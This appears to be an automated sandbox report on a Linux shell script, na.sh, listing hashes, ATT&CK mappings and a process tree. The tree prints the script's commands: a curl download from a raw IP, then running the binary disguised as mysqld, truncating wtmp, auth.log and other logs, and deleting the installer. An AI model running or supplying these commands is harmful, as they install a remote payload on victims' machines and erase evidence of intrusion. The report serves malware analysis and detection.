9162d65dd6f4fc97f3c9bfb7688f753f1b822eb1ecee2e8345ed75b2c0fca2e1

Analysis

max time kernel
149s
max time network
147s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-10-2024 10:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

913B
MD5

883b19aaff6f122396be677612ebc03c
SHA1

d73a73f477dc1db34777774effd2b27bd1ba20a2
SHA256

9162d65dd6f4fc97f3c9bfb7688f753f1b822eb1ecee2e8345ed75b2c0fca2e1
SHA512

ad177cc98647b8fb8ca01fcfa0397ddfb306ec12acf53b964d8ddbaf6610ebf477c2c1f18a6ba1c39b7c0bd7b786ecca54cab8aa2b2f76c18eb8472c8694982a

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1519	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/etc/mysqld	1520	mysqld

Deletes log files 1 TTPs 7 IoCs

Deletes log files on the system.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File truncated	/var/log/wtmp	na.sh
File truncated	/var/log/btmp	na.sh
File truncated	/var/log/secure	na.sh
File truncated	/var/log/message	na.sh
File truncated	/var/log/auth.log	na.sh
File truncated	/var/log/lastlog	na.sh
File truncated	/var/log/utmp	na.sh

Enumerates running processes
Discovers information about currently running processes on the system

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	mysqld

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/463/attr/current	ss
File opened for reading	/proc/1498/attr/current	ss
File opened for reading	/proc/137/fd	ss
File opened for reading	/proc/1253/fd	ss
File opened for reading	/proc/645/attr/current	ss
File opened for reading	/proc/1171/fd	ss
File opened for reading	/proc/29/fd	ss
File opened for reading	/proc/1057/attr/current	ss
File opened for reading	/proc/1186/fd	ss
File opened for reading	/proc/22/fd	ss
File opened for reading	/proc/486/stat	ss
File opened for reading	/proc/490/fd	ss
File opened for reading	/proc/645/stat	ss
File opened for reading	/proc/699/attr/current	ss
File opened for reading	/proc/169/fd	ss
File opened for reading	/proc/1081/fd	ss
File opened for reading	/proc/1165/fd	ss
File opened for reading	/proc/1474/fd	ss
File opened for reading	/proc/1033/fd	ss
File opened for reading	/proc/1159/stat	ss
File opened for reading	/proc/1085/attr/current	ss
File opened for reading	/proc/666/fd	ss
File opened for reading	/proc/721/fd	ss
File opened for reading	/proc/721/stat	ss
File opened for reading	/proc/1063/attr/current	ss
File opened for reading	/proc/271/stat	ss
File opened for reading	/proc/1504/fd	ss
File opened for reading	/proc/15/fd	ss
File opened for reading	/proc/23/fd	ss
File opened for reading	/proc/1165/attr/current	ss
File opened for reading	/proc/1181/stat	ss
File opened for reading	/proc/20/attr/current	ss
File opened for reading	/proc/474/attr/current	ss
File opened for reading	/proc/481/attr/current	ss
File opened for reading	/proc/530/fd	ss
File opened for reading	/proc/1269/stat	ss
File opened for reading	/proc/1307/attr/current	ss
File opened for reading	/proc/205/attr/current	ss
File opened for reading	/proc/449/fd	ss
File opened for reading	/proc/537/stat	ss
File opened for reading	/proc/1057/fd	ss
File opened for reading	/proc/1133/attr/current	ss
File opened for reading	/proc/1307/fd	ss
File opened for reading	/proc/1308/attr/current	ss
File opened for reading	/proc/1337/attr/current	ss
File opened for reading	/proc/82/fd	ss
File opened for reading	/proc/244/attr/current	ss
File opened for reading	/proc/1117/attr/current	ss
File opened for reading	/proc/1152/attr/current	ss
File opened for reading	/proc/1164/stat	ss
File opened for reading	/proc/1186/attr/current	ss
File opened for reading	/proc/175/attr/current	ss
File opened for reading	/proc/84/fd	ss
File opened for reading	/proc/596/fd	ss
File opened for reading	/proc/1142/stat	ss
File opened for reading	/proc/1287/attr/current	ss
File opened for reading	/proc/28/attr/current	ss
File opened for reading	/proc/89/attr/current	ss
File opened for reading	/proc/481/stat	ss
File opened for reading	/proc/959/stat	ss
File opened for reading	/proc/1183/fd	ss
File opened for reading	/proc/493/fd	ss
File opened for reading	/proc/1164/fd	ss
File opened for reading	/proc/1308/stat	ss

/tmp/na.sh
/tmp/na.sh
1⤵
- Deletes log files
PID:1502
- /usr/bin/awk
  awk -F "pid=" "{split(\$2,b,\",\");print b[1]}"
  2⤵
  PID:1506
- /bin/grep
  grep 3232
  2⤵
  PID:1505
- /bin/ss
  ss -tunp
  2⤵
  - Reads runtime system information
  PID:1504
- /bin/uname
  uname -m
  2⤵
  PID:1511
- /usr/bin/curl
  curl -O -fskSL http://47.238.84.157:8000/mysqld
  2⤵
  PID:1515
- /bin/chmod
  chmod +x mysqld
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /usr/bin/nohup
  nohup ./mysqld
  2⤵
  PID:1520
- /etc/mysqld
  ./mysqld
  2⤵
  - Executes dropped EXE
  - Enumerates kernel/hardware configuration
  PID:1520
- /bin/cat
  cat /dev/null
  2⤵
  PID:1521
- /bin/cat
  cat /dev/null
  2⤵
  PID:1522
- /bin/cat
  cat /dev/null
  2⤵
  PID:1523
- /bin/cat
  cat /dev/null
  2⤵
  PID:1524
- /bin/rm
  rm -rf /root/mysqld.sh
  2⤵
  PID:1525

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/mysqld

Filesize
2.8MB

MD5
14e497e9499860df57aac43d10e4bde6

SHA1
8a7cc1608d1b2394a25c8785e85eb2d2c0619862

SHA256
6a44a88574f8841824a5526d01dc9059b490d2ff4eb9f6e4f55cb0a5dcf8ddd1

SHA512
1124c687a83b860fa12480f296ff2d44ddbf4ff3a212f432b0a396c14ece1c05d860066f528394a16aa7aeb3f8a9d3fdff3df56a2544fe7b69ae039bca8d117f

Download Submit
/var/log/utmp

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
memory/1520-1-0x0000000000400000-0x0000000000bcf5b0-memory.dmp

Download